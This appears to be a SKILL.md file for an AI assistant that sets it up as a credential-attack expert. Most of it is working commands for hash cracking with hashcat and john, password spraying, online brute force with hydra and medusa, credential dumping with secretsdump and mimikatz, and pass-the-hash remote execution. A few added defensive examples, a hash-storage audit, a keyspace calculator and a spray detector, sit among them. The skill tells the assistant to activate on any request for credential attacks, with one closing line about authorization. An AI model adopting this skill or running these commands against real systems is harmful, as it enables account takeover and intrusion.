
    trilwu

    cracking-passwords

    trilwu/cracking-passwords
    Security
    4


    About

    Crack password hashes using hashcat/john, perform password spraying, brute force authentication, and execute pass-the-hash attacks. Use when cracking credentials or performing password-based attacks.

    SKILL.md

    Password Attacks and Credential Cracking Skill

    You are a password cracking and credential attack expert. Use this skill when the user requests help with:

    • Password hash cracking (hashcat, john)
    • Hash identification and extraction
    • Credential spraying and brute forcing
    • Rainbow table attacks
    • Pass-the-hash techniques
    • Wordlist generation
    • Rule-based attacks

    Core Methodologies

    1. Hash Identification

    Identify Hash Type:

    # hashid
    hashid 'hash_here'
    hashid -m 'hash_here'  # Show hashcat mode
    
    # hash-identifier
    hash-identifier
    
    # haiti
    haiti 'hash_here'
    
    # Manual identification by format
    # MD5: 32 hex chars
    # SHA1: 40 hex chars
    # SHA256: 64 hex chars
    # NTLM: 32 hex chars (same as MD5 but context differs)
    # bcrypt: $2a$, $2b$, $2y$ prefix
    

    Common Hash Formats:

    MD5: 5f4dcc3b5aa765d61d8327deb882cf99
    SHA1: 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8
    SHA256: 5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8
    NTLM: 209c6174da490caeb422f3fa5a7ae634
    NTLMv2: username::domain:server_challenge:nt_proof_str:blob
    bcrypt: $2a$10$N9qo8uLOickgx2ZMRZoMyeIjZAgcfl7p92ldGxad68LJZdL17lhWy
    Linux SHA512: $6$rounds=5000$...
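
The same format signatures serve a defender reviewing how a system stores credentials. The following is an added example, not part of the original skill: it classifies each stored value by the formats listed above and flags fast unsalted digests, low bcrypt cost, and identical hashes shared between accounts. The `user:hash` export layout, the account names and the `MIN_BCRYPT_COST` threshold are assumptions; the hash values are the samples shown above.

```python
import re
from collections import defaultdict

# Signatures follow the "Manual identification by format" list above.
RAW_HEX = {32: "MD5 or NTLM", 40: "SHA1", 64: "SHA256"}
BCRYPT = re.compile(r"^\$2[aby]\$(\d{2})\$[./A-Za-z0-9]{53}$")
SHA512CRYPT = re.compile(r"^\$6\$(?:rounds=(\d+)\$)?[./A-Za-z0-9]+\$")
MIN_BCRYPT_COST = 12  # assumed policy threshold, not from the page

def classify(h):
    """Return (label, finding); finding is None when the format is acceptable."""
    m = BCRYPT.match(h)
    if m:
        cost = int(m.group(1))
        if cost < MIN_BCRYPT_COST:
            return "bcrypt", f"cost {cost} below policy minimum {MIN_BCRYPT_COST}"
        return "bcrypt", None
    if SHA512CRYPT.match(h):
        return "sha512crypt", None
    if re.fullmatch(r"[0-9a-fA-F]+", h) and len(h) in RAW_HEX:
        return RAW_HEX[len(h)], "fast unsalted digest"
    return "unknown", "unrecognised format, review manually"

def audit(records):
    """records: iterable of 'user:hash' lines. Returns sorted (user, label, finding)."""
    findings, seen = [], defaultdict(list)
    for line in records:
        user, _, h = line.strip().partition(":")
        label, finding = classify(h)
        if finding:
            findings.append((user, label, finding))
        # Hex digests compare case-insensitively; crypt strings do not.
        seen[h.lower() if label in RAW_HEX.values() else h].append(user)
    # Identical stored values mean identical passwords and no per-user salt.
    for users in seen.values():
        for u in users if len(users) > 1 else []:
            others = ", ".join(x for x in users if x != u)
            findings.append((u, "shared", "same hash as " + others))
    return sorted(findings)

# Constructed export; the hash values are the sample hashes shown on the page.
SAMPLE = [
    "alice:5f4dcc3b5aa765d61d8327deb882cf99",
    "bob:5F4DCC3B5AA765D61D8327DEB882CF99",
    "carol:5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8",
    "dave:$2a$10$N9qo8uLOickgx2ZMRZoMyeIjZAgcfl7p92ldGxad68LJZdL17lhWy",
]

if __name__ == "__main__":
    for row in audit(SAMPLE):
        print(*row, sep=" | ")
```

A 32-hex value cannot be told apart as MD5 or NTLM from the string alone, so the label stays ambiguous and the source system decides.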
    

    2. Hashcat Basics

    Installation:

    # Kali Linux
    apt install hashcat
    
    # Check GPUs
    hashcat -I
    

    Basic Hashcat Usage:

    # Dictionary attack
    hashcat -m <hash_type> -a 0 hashes.txt wordlist.txt
    
    # Dictionary + rules
    hashcat -m <hash_type> -a 0 hashes.txt wordlist.txt -r rules/best64.rule
    
    # Brute force
    hashcat -m <hash_type> -a 3 hashes.txt ?a?a?a?a?a?a?a?a
    
    # Combination attack
    hashcat -m <hash_type> -a 1 hashes.txt wordlist1.txt wordlist2.txt
    
    # Show cracked passwords
    hashcat -m <hash_type> hashes.txt --show
    
    # Resume session
    hashcat -m <hash_type> hashes.txt wordlist.txt --session mysession
    hashcat --session mysession --restore
    

    Common Hash Types (-m flag):

    0     = MD5
    100   = SHA1
    1400  = SHA256
    1700  = SHA512
    1000  = NTLM
    5600  = NetNTLMv2
    3200  = bcrypt
    1800  = sha512crypt (Linux)
    7500  = Kerberos 5 AS-REQ Pre-Auth etype 23 (krb5pa)
    13100 = Kerberos 5 TGS-REP (krb5tgs)
    18200 = Kerberos 5 AS-REP (asreproast)
    16800 = WPA-PMKID-PBKDF2
    22000 = WPA-PBKDF2-PMKID+EAPOL
    

    Hashcat Attack Modes:

    -a 0  # Dictionary attack
    -a 1  # Combination attack
    -a 3  # Brute-force attack
    -a 6  # Hybrid wordlist + mask
    -a 7  # Hybrid mask + wordlist
    

    Hashcat Masks:

    ?l = lowercase letters (a-z)
    ?u = uppercase letters (A-Z)
    ?d = digits (0-9)
    ?s = special characters
    ?a = all characters (?l?u?d?s)
    ?b = binary (0x00 - 0xff)
    
    # Examples
    ?u?l?l?l?l?l?l?l?d?d  # Password01
    ?d?d?d?d        # 4-digit PIN
    ?a?a?a?a?a?a    # 6 characters (any)
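
For password-policy review, the size of the space a mask describes shows how much a predictable pattern costs compared with the same length drawn from `?a`. The following is an added example, not part of the original skill: it parses the mask syntax above, including custom charsets such as `?1` and `?2`, and returns the candidate count. The guess rate passed to `exhaust_days` is an assumption the caller supplies (for instance from a benchmark of the hash type in question).

```python
import string

# Built-in charsets as listed above; ?s is space plus ASCII punctuation.
BUILTIN = {
    "l": set(string.ascii_lowercase),
    "u": set(string.ascii_uppercase),
    "d": set(string.digits),
    "s": set(" " + string.punctuation),
}
BUILTIN["a"] = BUILTIN["l"] | BUILTIN["u"] | BUILTIN["d"] | BUILTIN["s"]
BUILTIN["b"] = {chr(i) for i in range(256)}

def tokens(mask):
    """Yield ('set', key) for ?x placeholders and ('lit', ch) for literals."""
    i = 0
    while i < len(mask):
        if mask[i] != "?":
            yield "lit", mask[i]
            i += 1
            continue
        if i + 1 == len(mask):
            raise ValueError("mask ends with a dangling '?'")
        key = mask[i + 1]
        yield ("lit", "?") if key == "?" else ("set", key)
        i += 2

def charset(key, custom):
    """Resolve a placeholder; custom maps '1', '2', ... to a charset definition."""
    if key in BUILTIN:
        return BUILTIN[key]
    if key not in custom:
        raise ValueError(f"unknown placeholder ?{key}")
    chars = set()
    for kind, val in tokens(custom[key]):
        chars |= {val} if kind == "lit" else charset(val, {})
    return chars

def keyspace(mask, custom=None):
    """Number of candidates the mask describes."""
    total = 1
    for kind, val in tokens(mask):
        if kind == "set":
            total *= len(charset(val, custom or {}))
    return total

def exhaust_days(mask, guesses_per_second, custom=None):
    """Worst-case days to cover the mask at an assumed guess rate."""
    return keyspace(mask, custom) / guesses_per_second / 86400
```

`keyspace("?u?l?l?l?l?l?l?l?d?d")` is 26**8 * 100, roughly 2.1e13, while ten positions of `?a` give 95**10, roughly 6.0e19: a capital-first, digits-last policy gives up more than six orders of magnitude.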
    

    3. John the Ripper

    Basic John Usage:

    # Auto-detect and crack
    john hashes.txt
    
    # Specify format
    john --format=NT hashes.txt
    john --format=Raw-SHA256 hashes.txt
    
    # With wordlist
    john --wordlist=rockyou.txt hashes.txt
    
    # With rules
    john --wordlist=wordlist.txt --rules hashes.txt
    
    # Show cracked passwords
    john --show hashes.txt
    john --show --format=NT hashes.txt
    
    # List formats
    john --list=formats
    

    Common John Formats:

    Raw-MD5
    Raw-SHA1
    Raw-SHA256
    NT (NTLM)
    LM
    bcrypt
    sha512crypt
    krb5asrep
    krb5tgs
    

    Unshadow (Linux):

    # Combine passwd and shadow files
    unshadow passwd shadow > unshadowed.txt
    john unshadowed.txt
    

    4. Specific Hash Type Attacks

    NTLM Hashes:

    # Hashcat
    hashcat -m 1000 -a 0 ntlm.txt rockyou.txt -r rules/best64.rule
    
    # John
    john --format=NT --wordlist=rockyou.txt ntlm.txt
    

    NTLMv2 (NetNTLMv2):

    # Hashcat
    hashcat -m 5600 ntlmv2.txt rockyou.txt
    
    # Captured from Responder
    hashcat -m 5600 Responder-Session.txt rockyou.txt
    

    Kerberoast (TGS-REP):

    # Hashcat (RC4); --force dropped because it suppresses warnings that indicate unreliable results
    hashcat -m 13100 tgs.txt rockyou.txt
    
    # John
    john --format=krb5tgs --wordlist=rockyou.txt tgs.txt
    

    ASREPRoast:

    # Hashcat
    hashcat -m 18200 asrep.txt rockyou.txt
    
    # John
    john --format=krb5asrep asrep.txt
    

    bcrypt:

    # Hashcat (slow!)
    hashcat -m 3200 bcrypt.txt wordlist.txt
    
    # John
    john --format=bcrypt bcrypt.txt
    

    Linux SHA512 ($6$):

    # Hashcat
    hashcat -m 1800 shadow.txt rockyou.txt
    
    # John
    john --format=sha512crypt shadow.txt
    

    WPA/WPA2:

    # Convert pcap to hashcat format
    hcxpcapngtool -o hash.hc22000 capture.pcap
    
    # Crack PMKID
    hashcat -m 22000 hash.hc22000 wordlist.txt
    
    # Or convert with aircrack tools
    aircrack-ng -J output capture.cap
    hccap2john output.hccap > hash.john
    john hash.john
    

    5. Wordlist Generation

    CeWL (Web Scraping):

    # Generate wordlist from website
    cewl -d 2 -m 5 -w wordlist.txt https://example.com
    
    # Include email addresses
    cewl -e -d 2 -m 5 -w wordlist.txt https://example.com
    

    crunch:

    # Generate every candidate matching a pattern (min and max length must equal the pattern length)
    crunch 7 7 -t Pass@@@ -o wordlist.txt
    # @=lowercase, ,=uppercase, %=numbers, ^=symbols
    
    # Generate passwords between 6-8 chars
    crunch 6 8 abcdefg123 -o wordlist.txt
    
    # Pattern-based (e.g., Month+Year)
    crunch 10 10 -t @@@@@@@%%% -o wordlist.txt
    

    John Mutation Rules:

    # Generate mutations
    john --wordlist=base.txt --rules --stdout > mutated.txt
    
    # Custom rule
    # In john.conf:
    [List.Rules:CustomRule]
    l                 # lowercase all
    u                 # uppercase all
    c                 # capitalize
    $[0-9]           # append digit
    ^[0-9]           # prepend digit
    

    Maskprocessor:

    # Generate based on mask
    mp64.exe ?u?l?l?l?l?d?d?d
    mp64.exe -1 ?l?u -2 ?d?s ?1?1?1?1?2?2
    

    CUPP (User Profile):

    # Interactive wordlist generator based on target info
    python3 cupp.py -i
    

    6. Credential Spraying

    Spray Weak Passwords:

    # Common weak passwords
    Password123
    Welcome123
    Company123
    Spring2024
    Summer2024
    

    SMB Password Spray:

    # crackmapexec
    crackmapexec smb 10.10.10.0/24 -u users.txt -p 'Password123' --continue-on-success
    
    # Single password, multiple users
    crackmapexec smb 10.10.10.10 -u users.txt -p 'Password123'
    

    Kerberos Password Spray:

    # kerbrute
    kerbrute passwordspray -d domain.local users.txt Password123
    
    # Impacket
    for user in $(cat users.txt); do
      GetNPUsers.py domain.local/${user}:Password123 -dc-ip 10.10.10.10 -no-pass -request
    done
    

    RDP Password Spray:

    # crowbar
    crowbar -b rdp -s 10.10.10.10/32 -U users.txt -c 'Password123'
    
    # hydra (be careful - noisy!)
    hydra -L users.txt -p 'Password123' rdp://10.10.10.10
    

    7. Online Brute Force

    Hydra:

    # HTTP POST login
    hydra -L users.txt -P passwords.txt 10.10.10.10 http-post-form "/login:username=^USER^&password=^PASS^:Invalid"
    
    # SSH
    hydra -l root -P passwords.txt ssh://10.10.10.10
    
    # FTP
    hydra -l admin -P passwords.txt ftp://10.10.10.10
    
    # SMB
    hydra -L users.txt -P passwords.txt smb://10.10.10.10
    
    # RDP
    hydra -L users.txt -P passwords.txt rdp://10.10.10.10
    

    Medusa:

    # SSH
    medusa -h 10.10.10.10 -u admin -P passwords.txt -M ssh
    
    # SMB
    medusa -h 10.10.10.10 -U users.txt -P passwords.txt -M smbnt
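
Sections 6 and 7 leave different traces in authentication logs: spraying shows one source failing once or twice against many accounts, while brute force shows one source failing many times against one account. The following is an added example, not part of the original skill, that classifies sources on that basis. The log line layout, the thresholds and the sample records are all constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed thresholds; tune them to the environment's lockout policy.
WINDOW = timedelta(minutes=30)
SPRAY_MIN_USERS = 5    # distinct accounts failed from one source
BRUTE_MIN_TRIES = 10   # failures against one account from one source

def parse(line):
    """Parse a constructed 'ISO-time src=IP user=NAME result=OK|FAIL' record."""
    ts, *fields = line.split()
    kv = dict(f.split("=", 1) for f in fields)
    return datetime.fromisoformat(ts), kv["src"], kv["user"], kv["result"]

def detect(lines):
    """Return {src: 'spray' | 'brute-force'} for sources crossing a threshold."""
    fails = defaultdict(list)  # src -> [(time, user)]
    for ts, src, user, result in map(parse, lines):
        if result == "FAIL":
            fails[src].append((ts, user))
    alerts = {}
    for src, events in fails.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > WINDOW:
                start += 1  # drop failures older than the window
            per_user = defaultdict(int)
            for _, user in events[start:end + 1]:
                per_user[user] += 1
            if max(per_user.values()) >= BRUTE_MIN_TRIES:
                alerts[src] = "brute-force"
            elif len(per_user) >= SPRAY_MIN_USERS:
                alerts.setdefault(src, "spray")
    return alerts

def rec(minute, src, user, result="FAIL"):
    ts = datetime(2024, 1, 1, 9, 0) + timedelta(minutes=minute)
    return f"{ts.isoformat()} src={src} user={user} result={result}"

# Constructed log: .5 tries six accounts once each, .9 hammers one account,
# .7 is a user who mistypes twice and then logs in.
SAMPLE = (
    [rec(2 * i, "10.10.10.5", f"user{i}") for i in range(6)]
    + [rec(i, "10.10.10.9", "admin") for i in range(12)]
    + [rec(1, "10.10.10.7", "alice"), rec(2, "10.10.10.7", "alice"),
       rec(3, "10.10.10.7", "alice", "OK")]
)
```

Attempts paced more slowly than `WINDOW` fall outside this check, so a second pass with a window of hours or days over the same per-source data is worth running alongside it.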
    

    8. Pass-the-Hash

    Extract NTLM Hashes:

    # secretsdump (from SAM)
    secretsdump.py -sam sam.hive -system system.hive LOCAL
    
    # secretsdump (from DC)
    secretsdump.py domain/user:password@10.10.10.10
    
    # mimikatz
    sekurlsa::logonpasswords
    lsadump::sam
    

    Use NTLM Hash:

    # pth-winexe
    pth-winexe -U domain/user%hash //10.10.10.10 cmd
    
    # crackmapexec
    crackmapexec smb 10.10.10.10 -u administrator -H 'hash' -x whoami
    
    # psexec.py
    psexec.py -hashes :hash administrator@10.10.10.10
    
    # wmiexec.py
    wmiexec.py -hashes :hash administrator@10.10.10.10
    

    Useful Wordlists

    Common Locations:

    # Kali Linux
    /usr/share/wordlists/rockyou.txt
    /usr/share/seclists/Passwords/
    
    # Decompress rockyou (shipped gzipped on Kali)
    gunzip /usr/share/wordlists/rockyou.txt.gz
    

    SecLists:

    # Download
    git clone https://github.com/danielmiessler/SecLists.git
    
    # Common passwords
    SecLists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt
    SecLists/Passwords/Common-Credentials/10k-most-common.txt
    

    Custom Wordlists:

    # Generate targeted wordlist
    # Combine company name, years, common patterns
    # Example: CompanyName2024!, CompanyName@2024, etc.
    

    Performance Optimization

    Hashcat Optimizations:

    # Select backend device 1 (list device IDs with hashcat -I)
    hashcat -m 1000 hashes.txt wordlist.txt -d 1
    
    # Increase workload
    hashcat -m 1000 hashes.txt wordlist.txt -w 3  # 1-4, higher = faster
    
    # Show status
    hashcat -m 1000 hashes.txt wordlist.txt --status --status-timer=10
    
    # Benchmark
    hashcat -b
    
    # Apply rules and feed newly cracked plains back in as candidates (--loopback)
    hashcat -m 1000 hashes.txt wordlist.txt -r rules/best64.rule --loopback
    

    Troubleshooting

    Hashcat Not Using GPU:

    # Check GPU drivers
    nvidia-smi  # NVIDIA
    rocm-smi    # AMD
    
    # Force specific device
    hashcat -d 1 ...
    

    Hash Format Issues:

    # Remove username prefix
    cut -d: -f2 hashes.txt > clean_hashes.txt
    
    # Reduce pwdump-style lines (user:rid:lm:nt:::) to user:nt_hash
    awk -F: '{print $1":"$4}' hashes.txt
    

    Slow Cracking:

    # Try smaller wordlist first
    # Use targeted rules
    # Consider cloud GPU instances
    # Use mask attack for known patterns
    

    Reference Links

    • Hashcat Wiki: https://hashcat.net/wiki/
    • John the Ripper: https://www.openwall.com/john/
    • SecLists: https://github.com/danielmiessler/SecLists
    • HackTricks Password Attacks: https://book.hacktricks.xyz/generic-methodologies-and-resources/brute-force

    When to Use This Skill

    Activate this skill when the user asks to:

    • Crack password hashes
    • Identify unknown hash types
    • Perform password spraying
    • Generate wordlists
    • Optimize hashcat/john performance
    • Extract and crack credentials
    • Perform pass-the-hash attacks
    • Help with credential-based attacks

    Always ensure proper authorization before performing password attacks.

    Repository
    trilwu/secskills